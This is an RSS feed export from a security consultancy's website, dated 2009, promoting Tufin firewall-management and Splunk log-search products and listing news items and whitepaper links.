<p class="contenttext">Our security experts can&nbsp;give a demonstration of Tufin&nbsp;at your office. This will take&nbsp;approximately&nbsp;one hour.</p>]]></description><content:encoded><![CDATA[ <p><img src="/img-sec/partners/big/Tufin_logo_Web.jpg" style="float: right;"/><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Tufin: How to get it?</span></p>
<p class="contenttext">For a live demo or a quote, please feel free to <a href="http://www.zionsecurity.com/contact.aspx">contact</a> one of our representatives.</p>
<p class="contenttext">Our security experts can&nbsp;give a demonstration of Tufin&nbsp;at your office. This will take&nbsp;approximately&nbsp;one hour.</p>]]></content:encoded></item><item><title>Tufin screenshots</title><link>http://www.zionsecurity.com/partners/tufin/tufin-screenshots.aspx</link><pubDate>2009-08-07T10:20:21</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/tufin/tufin-screenshots.aspx</guid><description><![CDATA[ <p><img src="/img-sec/partners/big/Tufin_logo_Web.jpg" style="float: right;"/><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Some screenshots</span></p>
<p class="contenttext">Click on the pictures for a more detailed view.</p>
<p class="contenttext">Screenshot 1: <strong>Object comparison</strong></p>
<p class="contenttext"><a href="/media/10260/tufin object comparison.png" target="_blank"><img src="/media/10260/tufin object comparison_251x191.jpg"  width="251"  height="191" alt="Tufin object comparison"/></a></p>
<p class="contenttext">Screenshot 2: <strong>Rule and Object usage analysis</strong></p>
<p class="contenttext"><a href="/media/10265/rule_and_object_usage_analysis_check_point.png" target="_blank"><img src="/media/10265/rule_and_object_usage_analysis_check_point_250x191.jpg"  width="250"  height="191" alt="Tufin object comparison"/></a></p>
<p class="contenttext">Screenshot 3: <strong>Firewall rule change report</strong></p>
<p class="contenttext"><a href="/media/10280/firewall_rule_change_report.png" target="_blank"><img src="/media/10280/firewall_rule_change_report_141x191.jpg"  width="141"  height="191" alt="Tufin object comparison"/></a></p>
<p class="contenttext">Screenshot 4: <strong>Firewall OS Monitoring</strong></p>
<p class="contenttext"><a href="/media/10275/firewall_os_monitoring.png" target="_blank"><img src="/media/10275/firewall_os_monitoring_236x185.jpg"  width="236"  height="185" alt="firewall_os_monitoring"/></a></p>
<p class="contenttext">Screenshot 5: <strong>Business ownership change report</strong></p>
<p class="contenttext"><a href="/media/10270/business_ownership_change_report.png" target="_blank"><img src="/media/10270/business_ownership_change_report_251x185.jpg"  width="251"  height="185" alt="Tufin object comparison"/></a></p>]]></description><content:encoded><![CDATA[ <p><img src="/img-sec/partners/big/Tufin_logo_Web.jpg" style="float: right;"/><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Some screenshots</span></p>
<p class="contenttext">Click on the pictures for a more detailed view.</p>
<p class="contenttext">Screenshot 1: <strong>Object comparison</strong></p>
<p class="contenttext"><a href="/media/10260/tufin object comparison.png" target="_blank"><img src="/media/10260/tufin object comparison_251x191.jpg"  width="251"  height="191" alt="Tufin object comparison"/></a></p>
<p class="contenttext">Screenshot 2: <strong>Rule and Object usage analysis</strong></p>
<p class="contenttext"><a href="/media/10265/rule_and_object_usage_analysis_check_point.png" target="_blank"><img src="/media/10265/rule_and_object_usage_analysis_check_point_250x191.jpg"  width="250"  height="191" alt="Tufin object comparison"/></a></p>
<p class="contenttext">Screenshot 3: <strong>Firewall rule change report</strong></p>
<p class="contenttext"><a href="/media/10280/firewall_rule_change_report.png" target="_blank"><img src="/media/10280/firewall_rule_change_report_141x191.jpg"  width="141"  height="191" alt="Tufin object comparison"/></a></p>
<p class="contenttext">Screenshot 4: <strong>Firewall OS Monitoring</strong></p>
<p class="contenttext"><a href="/media/10275/firewall_os_monitoring.png" target="_blank"><img src="/media/10275/firewall_os_monitoring_236x185.jpg"  width="236"  height="185" alt="firewall_os_monitoring"/></a></p>
<p class="contenttext">Screenshot 5: <strong>Business ownership change report</strong></p>
<p class="contenttext"><a href="/media/10270/business_ownership_change_report.png" target="_blank"><img src="/media/10270/business_ownership_change_report_251x185.jpg"  width="251"  height="185" alt="Tufin object comparison"/></a></p>]]></content:encoded></item><item><title>Your benefits</title><link>http://www.zionsecurity.com/partners/tufin/your-benefits.aspx</link><pubDate>2009-08-07T10:18:52</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/tufin/your-benefits.aspx</guid><description><![CDATA[ <p><img src="/img-sec/partners/big/Tufin_logo_Web.jpg" style="float: right;"/><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Tufin: your benefits</span></p>
<p class="contenttext">Your&nbsp;key benefits&nbsp;using Tufin SecureTrack&nbsp;are:</p>
<ul class="agenda">
<li>Tufin monitors firewall policy changes, reports them in real-time and maintains a comprehensive, accurate audit trail for full accountability.</li>
<br />
<li>Analysis and clean-up of complex rule bases and objects. Tufin for example locates unused rules so that they can be removed, thereby&nbsp;eliminating potential security&nbsp;holes and improve performance. It also enables administrators to organize the rule base according to priority to improve performance and to reduce the need for additional hardware.</li>
<br />
<li>Powerful simulation and risk analysis to identify potential security risks, ensure compliance with organizational security standards, and prevent service interruptions.</li>
<br />
<li>Comprehensive monitoring of critical firewall operating system components and server performance indicators to prevent service interruptions and enable effective auditing. </li>
<br />
<li>Best practice audit: Tufin compares current security policy to the industry's best practices to identify potential errors or areas for improvement.</li>
<br />
<li>Integration with change management, ticketing systems.</li>
<br />
<li>Intuitive, graphical views of firewall policies, rule bases and configuration changes for Check Point, Cisco, Juniper, Fortinet, F5 and Bluecoat&nbsp;firewalls.</li>
</ul>]]></description><content:encoded><![CDATA[ <p><img src="/img-sec/partners/big/Tufin_logo_Web.jpg" style="float: right;"/><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Tufin: your benefits</span></p>
<p class="contenttext">Your&nbsp;key benefits&nbsp;using Tufin SecureTrack&nbsp;are:</p>
<ul class="agenda">
<li>Tufin monitors firewall policy changes, reports them in real-time and maintains a comprehensive, accurate audit trail for full accountability.</li>
<br />
<li>Analysis and clean-up of complex rule bases and objects. Tufin for example locates unused rules so that they can be removed, thereby&nbsp;eliminating potential security&nbsp;holes and improve performance. It also enables administrators to organize the rule base according to priority to improve performance and to reduce the need for additional hardware.</li>
<br />
<li>Powerful simulation and risk analysis to identify potential security risks, ensure compliance with organizational security standards, and prevent service interruptions.</li>
<br />
<li>Comprehensive monitoring of critical firewall operating system components and server performance indicators to prevent service interruptions and enable effective auditing. </li>
<br />
<li>Best practice audit: Tufin compares current security policy to the industry's best practices to identify potential errors or areas for improvement.</li>
<br />
<li>Integration with change management, ticketing systems.</li>
<br />
<li>Intuitive, graphical views of firewall policies, rule bases and configuration changes for Check Point, Cisco, Juniper, Fortinet, F5 and Bluecoat&nbsp;firewalls.</li>
</ul>]]></content:encoded></item><item><title>Whitepaper: 10 tips voor een veilige eID implementatie</title><link>http://www.zionsecurity.com/news/whitepaper-10-tips-voor-een-veilige-eid-implementatie.aspx</link><pubDate>2009-07-31T17:26:10</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/whitepaper-10-tips-voor-een-veilige-eid-implementatie.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>What is Tufin?</title><link>http://www.zionsecurity.com/partners/tufin/what-is-tufin.aspx</link><pubDate>2009-07-31T16:45:22</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/tufin/what-is-tufin.aspx</guid><description><![CDATA[ <p><img src="/img-sec/partners/big/Tufin_logo_Web.jpg" style="float: right;"/><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>What is Tufin?</span></p>
<p class="contenttext">Tufin SecureTrack is the leading Firewall Operations Management Solution.&nbsp;&nbsp;</p>
<p class="contenttext">It's capable of gathering detailed information from a very large number of firewalls and its real time policy monitoring and analysis capabilities make it an ideal partner for change management teams.</p>
<p class="contenttext">Tufin SecureTrack<sup> </sup>is the most comprehensive solution available for managing and auditing firewalls. With support for all major firewall vendors (Checkpoint, Cisco, Juniper, BlueCoat, F5, Fortinet), SecureTrack provides a cohesive, unified view of all of firewalls - along with many other security devices - on the network.</p>
<p class="contenttext">SecureTrack is essential to ensuring that a corporate security policy is being implemented consistently in an environment with multiple rule bases, geographies, and teams.</p>
<p class="contenttext"><strong>With Tufin SecureTrack, you will increase productivity of the whole organization by better understanding how to manage and audit your firewalls.</strong> &nbsp;</p>
<p>&nbsp;</p>]]></description><content:encoded><![CDATA[ <p><img src="/img-sec/partners/big/Tufin_logo_Web.jpg" style="float: right;"/><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>What is Tufin?</span></p>
<p class="contenttext">Tufin SecureTrack is the leading Firewall Operations Management Solution.&nbsp;&nbsp;</p>
<p class="contenttext">It's capable of gathering detailed information from a very large number of firewalls and its real time policy monitoring and analysis capabilities make it an ideal partner for change management teams.</p>
<p class="contenttext">Tufin SecureTrack<sup> </sup>is the most comprehensive solution available for managing and auditing firewalls. With support for all major firewall vendors (Checkpoint, Cisco, Juniper, BlueCoat, F5, Fortinet), SecureTrack provides a cohesive, unified view of all of firewalls - along with many other security devices - on the network.</p>
<p class="contenttext">SecureTrack is essential to ensuring that a corporate security policy is being implemented consistently in an environment with multiple rule bases, geographies, and teams.</p>
<p class="contenttext"><strong>With Tufin SecureTrack, you will increase productivity of the whole organization by better understanding how to manage and audit your firewalls.</strong> &nbsp;</p>
<p>&nbsp;</p>]]></content:encoded></item><item><title>Splunk: How to get it?</title><link>http://www.zionsecurity.com/partners/splunk/splunk-how-to-get-it.aspx</link><pubDate>2009-07-31T14:19:37</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/splunk/splunk-how-to-get-it.aspx</guid><description><![CDATA[ <p><img src="/img-sec/partners/big/splunk.png" width="151" height="34" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Splunk: How to get it?</span></p>
<p class="contenttext">For a live demo or a quote, please feel free to <a href="http://www.zionsecurity.com/contact.aspx">contact</a> one of our representatives. Our security experts can setup a demo at your office. This will take no longer than 30 minutes.</p>
<p class="contenttext">You can also download a free, limited edition of Splunk. Just click <a href="http://www.splunk.com/?ac=Partner_Zion">here</a>.</p>]]></description><content:encoded><![CDATA[ <p><img src="/img-sec/partners/big/splunk.png" width="151" height="34" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Splunk: How to get it?</span></p>
<p class="contenttext">For a live demo or a quote, please feel free to <a href="http://www.zionsecurity.com/contact.aspx">contact</a> one of our representatives. Our security experts can setup a demo at your office. This will take no longer than 30 minutes.</p>
<p class="contenttext">You can also download a free, limited edition of Splunk. Just click <a href="http://www.splunk.com/?ac=Partner_Zion">here</a>.</p>]]></content:encoded></item><item><title>References</title><link>http://www.zionsecurity.com/partners/splunk/references.aspx</link><pubDate>2009-07-31T14:18:36</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/splunk/references.aspx</guid><description><![CDATA[ <p><img src="/img-sec/partners/big/splunk.png" width="151" height="34" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Splunk: References</span></p>
<p class="contenttext">More than 350.000 people worldwide already are using Splunk, including over 1.000 licensed customers. Some examples are Cisco, Dow Jones, LinkedIn, Motorola, MySpace, NASA, T-Mobile, Verisign, Verizon, Visa and Vodafone.</p>
<p class="contenttext">All customers testify that they are improving operations, investigating security incidents in record time and meeting compliance requirements at lower cost, using Splunk.</p>]]></description><content:encoded><![CDATA[ <p><img src="/img-sec/partners/big/splunk.png" width="151" height="34" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Splunk: References</span></p>
<p class="contenttext">More than 350.000 people worldwide already are using Splunk, including over 1.000 licensed customers. Some examples are Cisco, Dow Jones, LinkedIn, Motorola, MySpace, NASA, T-Mobile, Verisign, Verizon, Visa and Vodafone.</p>
<p class="contenttext">All customers testify that they are improving operations, investigating security incidents in record time and meeting compliance requirements at lower cost, using Splunk.</p>]]></content:encoded></item><item><title>Your benefit</title><link>http://www.zionsecurity.com/partners/splunk/your-benefit.aspx</link><pubDate>2009-07-31T14:17:06</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/splunk/your-benefit.aspx</guid><description><![CDATA[ <p><img src="/img-sec/partners/big/splunk.png" width="151" height="34" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Splunk: Your benefit</span></p>
<p class="contenttext">Your whole IT team will be smarter as they share saved searches, tag events, hosts and configurations with useful information and build their own dashboards with interactive charts, graphs, tables and more.</p>
<p class="contenttext">By making it possible for humans to interact with terabytes of IT data, Splunk is fundamentally changing how organizations manage, secure and audit increasingly complex computing environments.</p>]]></description><content:encoded><![CDATA[ <p><img src="/img-sec/partners/big/splunk.png" width="151" height="34" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Splunk: Your benefit</span></p>
<p class="contenttext">Your whole IT team will be smarter as they share saved searches, tag events, hosts and configurations with useful information and build their own dashboards with interactive charts, graphs, tables and more.</p>
<p class="contenttext">By making it possible for humans to interact with terabytes of IT data, Splunk is fundamentally changing how organizations manage, secure and audit increasingly complex computing environments.</p>]]></content:encoded></item><item><title>Splunk and Security</title><link>http://www.zionsecurity.com/partners/splunk/splunk-and-security.aspx</link><pubDate>2009-07-31T14:15:42</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/splunk/splunk-and-security.aspx</guid><description><![CDATA[ <p><img src="/img-sec/partners/big/splunk.png" width="151" height="34" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Splunk: Enables to secure your IT infrastructure</span></p>
<p class="contenttext">Splunk gives you the opportunity to investigate security incidents in record time by searching and analyzing all your security-relevant data from one place.</p>
<p class="contenttext">It helps security analysts to investigate incidents in minutes instead of hours or days by searching and analyzing all security relevant data from one place - catching attackers and malicious insiders who had previously gone undetected.</p>
<p class="contenttext">Splunk improves your security posture by quickly filtering out false positives and visualize security information for situational awareness.</p>
<p class="contenttext">The figure below indicates how Splunk enables you to secure your IT infrastructure.</p>
<p class="contenttext"><img src="/media/10250/splunk securityl.png" width="305" height="300" alt="Splunk securityl"/></p>
<ol class="agenda">
<li>Index all the data you need to monitor and investigate any type of threat - OS, IDS, firewall, network device, DNS, DHCP, remote access and AAA logs, proxy, web, custom application logs and more.</li>
<br />
<li>Security analysts and incident response teams will initially adopt Splunk to investigate IDS and SIEM alerts, investigate activity for flagged users and investigate access to sensitive data.</li>
<br />
<li>As they go, they'll enrich the raw data by tagging events they encounter as significant; normalizing heterogeneous data formats on-the-fly by extracting and naming fields, such as usernames, and identifying and naming events, such as successful logins.</li>
<br />
<li>Automatically monitor for known bad events, and use sophisticated correlation via search, to find known risk patterns such brute force attacks, data leakage and even application-level fraud.</li>
<br />
<li>Security managers will take advantage of Splunk's reporting to get a birds-eye view of security-relevant events such as firewall reporting, IDS rule violations and login activity. Use Splunk proactively to search for attack footprints in response to reports of new zero-day attacks, review trends in logins and other activity to uncover suspicious patterns and anomalies to find previously undetected attacks. </li>
</ol>]]></description><content:encoded><![CDATA[ <p><img src="/img-sec/partners/big/splunk.png" width="151" height="34" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Splunk: Enables to secure your IT infrastructure</span></p>
<p class="contenttext">Splunk gives you the opportunity to investigate security incidents in record time by searching and analyzing all your security-relevant data from one place.</p>
<p class="contenttext">It helps security analysts to investigate incidents in minutes instead of hours or days by searching and analyzing all security relevant data from one place - catching attackers and malicious insiders who had previously gone undetected.</p>
<p class="contenttext">Splunk improves your security posture by quickly filtering out false positives and visualize security information for situational awareness.</p>
<p class="contenttext">The figure below indicates how Splunk enables you to secure your IT infrastructure.</p>
<p class="contenttext"><img src="/media/10250/splunk securityl.png" width="305" height="300" alt="Splunk securityl"/></p>
<ol class="agenda">
<li>Index all the data you need to monitor and investigate any type of threat - OS, IDS, firewall, network device, DNS, DHCP, remote access and AAA logs, proxy, web, custom application logs and more.</li>
<br />
<li>Security analysts and incident response teams will initially adopt Splunk to investigate IDS and SIEM alerts, investigate activity for flagged users and investigate access to sensitive data.</li>
<br />
<li>As they go, they'll enrich the raw data by tagging events they encounter as significant; normalizing heterogeneous data formats on-the-fly by extracting and naming fields, such as usernames, and identifying and naming events, such as successful logins.</li>
<br />
<li>Automatically monitor for known bad events, and use sophisticated correlation via search, to find known risk patterns such brute force attacks, data leakage and even application-level fraud.</li>
<br />
<li>Security managers will take advantage of Splunk's reporting to get a birds-eye view of security-relevant events such as firewall reporting, IDS rule violations and login activity. Use Splunk proactively to search for attack footprints in response to reports of new zero-day attacks, review trends in logins and other activity to uncover suspicious patterns and anomalies to find previously undetected attacks. </li>
</ol>]]></content:encoded></item><item><title>What makes Splunk so different?</title><link>http://www.zionsecurity.com/partners/splunk/what-makes-splunk-so-different.aspx</link><pubDate>2009-07-31T14:13:52</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/splunk/what-makes-splunk-so-different.aspx</guid><description><![CDATA[ <p><img src="/img-sec/partners/big/splunk.png" width="151" height="34" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>What makes Splunk so different from other solutions?</span></p>
<p class="contenttext">Splunk is unique because of 6 reasons:</p>
<ul class="agenda">
<li>Splunk indexes any data, every word of every event from any IT source in real time, without using databases, expensive connectors, custom parsers or proprietary consoles. It allows you to search for any term or grouping of words whole or fractional, in a google manner.</li>
<br />
<li>Splunk lets you interact with your search results immediately. Zoom in and out on a time line of your results to quickly reveal trends, spikes and anomalies. Using statistics, graphs and other practical tools you can find in no time the needle in the haystack.</li>
<br />
<li>Splunk is immensely scalable. Architecturally, Splunk can maintain online data access for years if desired using nothing more than a file system (no DB).</li>
<br />
<li>Splunk does not use a Database and as such is schema-less.&nbsp; All data is stored in an open format (gzip) and can be signed to ensure no one has tampered with the files.</li>
<br />
<li>Splunk operates across all business units as IT search is not owned by a particular business unit. Splunk is a unifying tool that provides a predictable and common view into all log data across your organization. </li>
<br />
<li>Splunk is build on a platform from which the customer can freely and with ease add on their own customization. So the customer has the ability to modify, if needed.</li>
</ul>]]></description><content:encoded><![CDATA[ <p><img src="/img-sec/partners/big/splunk.png" width="151" height="34" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>What makes Splunk so different from other solutions?</span></p>
<p class="contenttext">Splunk is unique because of 6 reasons:</p>
<ul class="agenda">
<li>Splunk indexes any data, every word of every event from any IT source in real time, without using databases, expensive connectors, custom parsers or proprietary consoles. It allows you to search for any term or grouping of words whole or fractional, in a google manner.</li>
<br />
<li>Splunk lets you interact with your search results immediately. Zoom in and out on a time line of your results to quickly reveal trends, spikes and anomalies. Using statistics, graphs and other practical tools you can find in no time the needle in the haystack.</li>
<br />
<li>Splunk is immensely scalable. Architecturally, Splunk can maintain online data access for years if desired using nothing more than a file system (no DB).</li>
<br />
<li>Splunk does not use a Database and as such is schema-less.&nbsp; All data is stored in an open format (gzip) and can be signed to ensure no one has tampered with the files.</li>
<br />
<li>Splunk operates across all business units as IT search is not owned by a particular business unit. Splunk is a unifying tool that provides a predictable and common view into all log data across your organization. </li>
<br />
<li>Splunk is build on a platform from which the customer can freely and with ease add on their own customization. So the customer has the ability to modify, if needed.</li>
</ul>]]></content:encoded></item><item><title>What is Splunk?</title><link>http://www.zionsecurity.com/partners/splunk/what-is-splunk.aspx</link><pubDate>2009-07-31T14:12:01</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/splunk/what-is-splunk.aspx</guid><description><![CDATA[ <p><img src="/img-sec/partners/big/splunk.png" width="151" height="34" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>What is Splunk?</span></p>
<p class="contenttext">Splunk is IT search. For that reason Splunk is often called "Google for IT".</p>
<p class="contenttext">With Splunk you can instantly figure out what is happening anywhere in your infrastructure by making use of all the data being logged within your data center.</p>
<p class="contenttext">Only Splunk enables you to search, analyze, monitor and report on data from any application, server or network device in real time to troubleshoot application outages, investigate security incidents, meet compliance requirements, and more, in minutes instead of hours or days.</p>
<p class="contenttext">Logs, configurations, messages, traps and alerts, scripts, code, metrics and more. If a machine can generate it - Splunk can eat it !!!</p>
<p class="contenttext">Now you can search across terabytes of data in seconds to find that needle in the haystack, analyze hidden trends and instantly create reports to summarize activities. Schedule searches to alert on specific conditions and automate the delivery of reports.</p>]]></description><content:encoded><![CDATA[ <p><img src="/img-sec/partners/big/splunk.png" width="151" height="34" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>What is Splunk?</span></p>
<p class="contenttext">Splunk is IT search. For that reason Splunk is often called "Google for IT".</p>
<p class="contenttext">With Splunk you can instantly figure out what is happening anywhere in your infrastructure by making use of all the data being logged within your data center.</p>
<p class="contenttext">Only Splunk enables you to search, analyze, monitor and report on data from any application, server or network device in real time to troubleshoot application outages, investigate security incidents, meet compliance requirements, and more, in minutes instead of hours or days.</p>
<p class="contenttext">Logs, configurations, messages, traps and alerts, scripts, code, metrics and more. If a machine can generate it - Splunk can eat it !!!</p>
<p class="contenttext">Now you can search across terabytes of data in seconds to find that needle in the haystack, analyze hidden trends and instantly create reports to summarize activities. Schedule searches to alert on specific conditions and automate the delivery of reports.</p>]]></content:encoded></item><item><title>Whitepaper: Selecting a secure open source content management system</title><link>http://www.zionsecurity.com/news/whitepaper-selecting-a-secure-open-source-content-management-system.aspx</link><pubDate>2009-07-31T11:26:21</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/whitepaper-selecting-a-secure-open-source-content-management-system.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Case Study: Using Splunk for web application forensics</title><link>http://www.zionsecurity.com/news/case-study-using-splunk-for-web-application-forensics.aspx</link><pubDate>2009-07-31T11:20:50</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/case-study-using-splunk-for-web-application-forensics.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Erwin Geirnaert @ KVIV Security Testing day </title><link>http://www.zionsecurity.com/news/erwin-geirnaert-@-kviv-security-testing-day-.aspx</link><pubDate>2009-07-29T16:27:41</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/erwin-geirnaert-@-kviv-security-testing-day-.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Erwin Geirnaert @ TMAB Software-as-a-Service congress</title><link>http://www.zionsecurity.com/news/erwin-geirnaert-@-tmab-software-as-a-service-congress.aspx</link><pubDate>2009-07-29T16:27:27</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/erwin-geirnaert-@-tmab-software-as-a-service-congress.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Training "Improving your web applications security" </title><link>http://www.zionsecurity.com/news/training-improving-your-web-applications-security-.aspx</link><pubDate>2009-07-29T16:22:21</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/training-improving-your-web-applications-security-.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Erwin Geirnaert @ L-Sec Application Security day</title><link>http://www.zionsecurity.com/news/erwin-geirnaert-@-l-sec-application-security-day.aspx</link><pubDate>2009-07-29T16:21:59</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/erwin-geirnaert-@-l-sec-application-security-day.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>New training: Improving your ASP.NET applications security</title><link>http://www.zionsecurity.com/news/new-training-improving-your-aspnet-applications-security.aspx</link><pubDate>2009-07-29T16:21:11</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/new-training-improving-your-aspnet-applications-security.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>ZION SECURITY @ Infosecurity Belgium</title><link>http://www.zionsecurity.com/news/zion-security-@-infosecurity-belgium.aspx</link><pubDate>2009-07-29T16:20:34</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/news/zion-security-@-infosecurity-belgium.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Recent Incidents</title><link>http://www.zionsecurity.com/recent-incidents.aspx</link><pubDate>2009-07-29T15:21:20</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/recent-incidents.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Products</title><link>http://www.zionsecurity.com/downloads/products.aspx</link><pubDate>2009-07-29T11:41:29</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/downloads/products.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Products</span></p>
<p class="contenttext"><a href="/downloads/products/mollom-httpmodule.aspx">Mollom HTTPModule</a></p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Products</span></p>
<p class="contenttext"><a href="/downloads/products/mollom-httpmodule.aspx">Mollom HTTPModule</a></p>]]></content:encoded></item><item><title>Whitepapers</title><link>http://www.zionsecurity.com/downloads/whitepapers.aspx</link><pubDate>2009-07-29T11:35:30</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/downloads/whitepapers.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Whitepapers</span></p>
<ul class="agenda">
<li><a href="/downloads/whitepapers/web-hacking-incident-database-bi-annual-report.aspx">Web hacking database bi-annual report</a></li>
<li><a href="/downloads/whitepapers/whitepaper-analysis-of-an-unknown-malicious-javascript.aspx">Whitepaper: Analysis of an unknown malicious JavaScript</a></li>
<li><a href="/downloads/whitepapers/whitepaper-10-tips-voor-een-veilige-eid-implementatie.aspx">Whitepaper: 10 tips voor een veilige eID implementatie</a></li>
<li><a href="/downloads/whitepapers/whitepaper-selecting-a-secure-open-source-content-management-system.aspx">Whitepaper: Selecting a secure open source content management system</a></li>
<li><a href="/downloads/whitepapers/case-study-splunk.aspx">Case Study: Using Splunk for web application forensics</a></li>
<li><a href="/downloads/whitepapers/whitepaper-an-overview-of-the-current-situation-in-the-web-application-security-landscape.aspx">Whitepaper: An overview of the current situation in the web application security landscape</a></li>
<li><a href="/downloads/whitepapers/whitepaper-zend---owasp.aspx">ZEND &amp; OWASP ESAPI for PHP</a></li>
</ul>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Whitepapers</span></p>
<ul class="agenda">
<li><a href="/downloads/whitepapers/web-hacking-incident-database-bi-annual-report.aspx">Web hacking database bi-annual report</a></li>
<li><a href="/downloads/whitepapers/whitepaper-analysis-of-an-unknown-malicious-javascript.aspx">Whitepaper: Analysis of an unknown malicious JavaScript</a></li>
<li><a href="/downloads/whitepapers/whitepaper-10-tips-voor-een-veilige-eid-implementatie.aspx">Whitepaper: 10 tips voor een veilige eID implementatie</a></li>
<li><a href="/downloads/whitepapers/whitepaper-selecting-a-secure-open-source-content-management-system.aspx">Whitepaper: Selecting a secure open source content management system</a></li>
<li><a href="/downloads/whitepapers/case-study-splunk.aspx">Case Study: Using Splunk for web application forensics</a></li>
<li><a href="/downloads/whitepapers/whitepaper-an-overview-of-the-current-situation-in-the-web-application-security-landscape.aspx">Whitepaper: An overview of the current situation in the web application security landscape</a></li>
<li><a href="/downloads/whitepapers/whitepaper-zend---owasp.aspx">ZEND &amp; OWASP ESAPI for PHP</a></li>
</ul>]]></content:encoded></item><item><title>References</title><link>http://www.zionsecurity.com/company/references.aspx</link><pubDate>2009-07-29T10:05:25</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/company/references.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>References</span></p>
<p class="contenttext">&nbsp;</p>
<?UMBRACO_MACRO macroAlias="ZionSecurityEnReferences" />
<!--
<p>&nbsp;</p>
<p>&nbsp;</p>
<p class="contenttext"><a href="http://www.netlog.com" mce_href="http://www.netlog.com"><img src="/img/security/2_netlog.jpg" alt="Netlog"/></a></p>
<p class="contenttext"><a href="http://www.emailgarage.com" mce_href="http://www.emailgarage.com"><img src="/img/security/emailgarage.gif" alt="emailgarage"/></a></p>
<p class="contenttext"><a href="http://www.reference.be" mce_href="http://www.reference.be"><img src="/img/security/reference.gif" alt="the reference"/></a></p>
